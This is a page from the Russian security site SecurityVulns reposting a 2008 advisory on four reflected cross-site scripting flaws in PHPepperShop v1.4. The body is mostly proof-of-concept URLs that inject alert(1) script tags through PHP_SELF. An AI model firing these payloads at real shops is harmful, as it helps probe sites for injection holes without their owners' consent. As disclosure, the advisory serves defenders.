Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  Эксплоит для эксплуатации уязвимости EZSA-2008-003 с активацией учетной записи

  [DSECRG-08-041] Stored XSS Vulnerability in Xoops 2.3.x

  [DSECRG-08-040] Multiple Local File Include Vulnerabilities in Xoops 2.3.x

  [DSECRG-08-040] Multiple Local File Include Vulnerabilities in Xoops 2.3.x

From:th3.r00k_(at)_gmail.com <th3.r00k_(at)_gmail.com>
Date:10 декабря 2008 г.
Subject:XSS in PHPepperShop v 1.4

Vulnerable Version:PHPepperShop v 1.4
Homepage:http://www.phpeppershop.com

This is 4 reflective XSS flaws in the URI. Trust no one not even your $_SERVER[PHP_SELF]

http://10.1.1.10/shop/kontakt.php/'<script>alert(1)</script>


http://10.1.1.10/index.php/%22%3Cscript%3Ealert(1)%3C/scr
ipt%3E

http://10.1.1.155/Audit/Commerce/HackMe/shop/Admin/shop_kunden_mgmt.php/%22%
3Cscript%3Ealert
(1)%3C/script%3E

http://10.1.1.155/Audit/Commerce/HackMe/shop/Admin/SHOP_KONFIGURATION.php/"<
script>alert(1)</script>

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород